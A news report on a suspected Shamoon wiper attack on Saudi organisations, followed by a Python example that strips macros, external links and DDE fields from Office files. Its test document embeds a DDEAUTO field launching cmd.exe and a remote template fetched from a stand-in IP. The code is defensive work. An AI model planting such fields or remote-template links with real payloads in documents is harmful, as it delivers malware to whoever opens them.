Saudi on alert as cyber criminals target key organisations
Experts suspect Shamoon, the malware that paralysed Saudi Aramco's operations in 2012, is responsible
More details are emerging about a cyber attack on Saudi Arabia's public and private organisations, mainly in the petrochemicals sector, which came to light yesterday.
An alert from Saudi Arabia's telecoms authority, seen by Reuters, advised all parties to be vigilant for potential attacks.
ITP.net sources told us that between five and ten organisations were affected. Analysis indicates the attack was executed at 4am.
While it is not confirmed that this is the same variant of Shamoon that hit Saudi organisations in the past, our sources tell us the infection pattern, file creation and lateral movement are identical to the behaviour Palo Alto Networks documented in those earlier incidents. Shamoon crippled tens of thousands of computers at oil giant Saudi Aramco in 2012.
The Labour ministry and Sadara Chemical Co. have admitted they were attacked.
It’s believed the initial infection was via an email attachment.
The malware then infected further systems, possibly using stolen or weak credentials, and lay dormant until the moment it could cause maximum damage.
The malware follows the same destructive pattern as earlier Shamoon attacks: infected machines have their partition tables wiped, and only a complete system restore can recover the IT environment.
Nicolai Solling, CTO at Help AG commented: “Email has always been a major infection vector and organisations need to implement technologies and also enforce policies that safeguard against malicious email attachments.
“A successful defence is to utilise solutions such as OPSWAT Metadefender, which secures emails by utilising multiple malware inspection engines and reconstructs data without potential weaponized document features. As an example, it could remove macros, scripts or calls to external applications from inside an Office document,” Solling added.
As with the attack that occurred in December 2016, this malware lay dormant and executed at 4am, when most in-house IT teams aren't at work. This highlights the need for 24x7 monitoring of security events so as to react to and remediate them as soon as possible, thereby mitigating their impact, Solling said.
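The document reconstruction Solling describes, stripping macros, scripts and calls to external applications out of an Office file, as an added example in Python. This is not code from the article and not OPSWAT's product; it is a simplified content disarm and reconstruction (CDR) pass written for this page. The macro-enabled sample document is constructed in memory (part names, content types and relationship URIs are the real OOXML ones, the VBA blob is a placeholder), the function names are the example's own, and the scrubber uses regular expressions over the package XML rather than a full parser, so it covers only the cases shown.

```python
"""Content disarm and reconstruction (CDR) for an Office Open XML package.

Added example, not code from the article or from OPSWAT Metadefender. A .docm
is a zip of XML parts, so the scrubber copies the package part by part and drops
or rewrites the parts carrying macros, external links or DDE field codes.
The sample document at the bottom is constructed for this example.
"""
import io
import re
import zipfile

VBA_CT = "application/vnd.ms-office.vbaProject"
MACRO_MAIN_CT = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_MAIN_CT = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
HYPERLINK_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
REL_RE = re.compile(r"<Relationship\b[^>]*/>")
OVERRIDE_RE = re.compile(r"<Override\b[^>]*/>")
# field instruction text such as: DDEAUTO c:\\windows\\system32\\cmd.exe "/c ..."
DDE_FIELD_RE = re.compile(r"(<w:instrText\b[^>]*>)([^<]*\bDDE(?:AUTO)?\b[^<]*)(</w:instrText>)")


def _scrub_content_types(xml: str, log: list) -> str:
    """Forget the VBA parts and downgrade a macro-enabled main part to plain .docx."""
    def decide(m):
        if "vba" in m.group(0):  # overrides for vbaProject.bin / vbaData.xml
            log.append(f"[Content_Types].xml: removed override {m.group(0)}")
            return ""
        return m.group(0)
    xml = OVERRIDE_RE.sub(decide, xml)
    if MACRO_MAIN_CT in xml:
        log.append("[Content_Types].xml: downgraded macroEnabled main part")
        xml = xml.replace(MACRO_MAIN_CT, PLAIN_MAIN_CT)
    return xml


def _scrub_rels(xml: str, part: str, log: list) -> str:
    """Drop relationships that point at VBA or reach outside the package."""
    def decide(m):
        rel = m.group(0)
        if "/relationships/vbaProject" in rel or "/relationships/wordVbaData" in rel:
            log.append(f"{part}: removed VBA relationship")
            return ""
        # hyperlinks are external too, but cutting them would orphan r:id references
        # in the body; remote templates, linked OLE objects and linked images do go
        if 'TargetMode="External"' in rel and HYPERLINK_REL not in rel:
            log.append(f"{part}: removed external relationship {rel}")
            return ""
        return rel
    return REL_RE.sub(decide, xml)


def _scrub_body(xml: str, part: str, log: list) -> str:
    """Blank DDE field codes, which start an external application when the field updates."""
    def decide(m):
        log.append(f"{part}: blanked field code {m.group(2).strip()!r}")
        return m.group(1) + m.group(3)
    return DDE_FIELD_RE.sub(decide, xml)


def disarm_ooxml(data: bytes) -> tuple[bytes, list[str]]:
    """Rebuild the package without active content; returns (new bytes, log of removals)."""
    log: list[str] = []
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for name in src.namelist():
            payload = src.read(name)
            if name.rsplit("/", 1)[-1].lower().startswith("vba"):  # vbaProject.bin, vbaData.xml, their .rels
                log.append(f"dropped {name}")
                continue
            if name == "[Content_Types].xml":
                payload = _scrub_content_types(payload.decode(), log).encode()
            elif name.endswith(".rels"):
                payload = _scrub_rels(payload.decode(), name, log).encode()
            elif name.endswith(".xml"):
                payload = _scrub_body(payload.decode(), name, log).encode()
            dst.writestr(name, payload)
    return out.getvalue(), log


def read_parts(data: bytes) -> dict[str, bytes]:
    """Part name -> bytes, for inspecting a package."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return {n: z.read(n) for n in z.namelist()}


def build_sample_docm() -> bytes:
    """Constructed macro-enabled document with a VBA project, a remote template and a
    DDE field. Not a captured sample; the VBA blob is a placeholder, not a real OLE file."""
    parts = {
        "[Content_Types].xml":
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            f'<Override PartName="/word/document.xml" ContentType="{MACRO_MAIN_CT}"/>'
            f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_CT}"/></Types>',
        "word/_rels/document.xml.rels":
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/>'
            '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://203.0.113.5/template.dotm" TargetMode="External"/>'
            f'<Relationship Id="rId3" Type="{HYPERLINK_REL}" Target="https://example.com/" TargetMode="External"/></Relationships>',
        "word/document.xml":
            '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body><w:p>'
            '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
            '<w:r><w:instrText xml:space="preserve">DDEAUTO c:\\\\windows\\\\system32\\\\cmd.exe "/c calc.exe"</w:instrText></w:r>'
            '<w:r><w:fldChar w:fldCharType="end"/></w:r><w:r><w:t>Invoice attached</w:t></w:r>'
            '</w:p></w:body></w:document>',
        "word/vbaProject.bin": b"\xd0\xcf\x11\xe0 placeholder VBA blob",
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, body in parts.items():
            z.writestr(name, body)
    return buf.getvalue()


if __name__ == "__main__":
    print("\n".join(disarm_ooxml(build_sample_docm())[1]))
```

Run as a script it prints what was removed: the VBA override and relationship, the downgrade of the main part to a plain document, the remote-template relationship, the blanked DDEAUTO field code and the dropped vbaProject.bin. The hyperlink relationship is deliberately kept, since deleting it would leave a dangling r:id in the body and Word would refuse the file; a production CDR engine parses the XML properly, handles the other Office formats (xlsm, pptm, legacy OLE .doc) and verifies the rebuilt file still opens before delivering it.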